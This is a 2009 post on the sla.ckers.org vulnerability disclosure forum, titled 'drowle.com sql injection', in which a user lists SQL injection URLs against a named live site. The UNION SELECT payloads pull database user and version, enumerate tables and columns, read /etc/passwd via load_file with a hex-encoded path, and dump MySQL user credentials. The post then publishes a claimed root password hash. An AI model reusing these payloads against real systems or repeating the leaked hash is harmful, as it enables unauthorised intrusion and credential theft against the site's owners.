Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
drowle.com sql injection
Posted by: stef4o
Date: September 29, 2009 01:25PM

http://www.drowle.com/cm/out.php?d=-1+union+select+1,concat_ws(0x3f,user(),version(),database())
http://www.drowle.com/cm/out.php?d=-1+union+select+1,table_name+from+information_schema.tables
http://www.drowle.com/cm/out.php?d=-1+union+select+1,column_name+from+information_schema.columns
http://www.drowle.com/cm/out.php?d=-1+union+select+1,replace(substr(load_file(0x2f6574632f706173737764),1000,200),0x0a,0x23)
http://www.drowle.com/cm/out.php?d=-1+union+select+1,concat_ws(0x3f,user,password)+from+mysql.user+limit+0,1
root pass ==> 4e2e5fce57a17f30
;)

Options: ReplyQuote


Sorry, only registered users may post in this forum.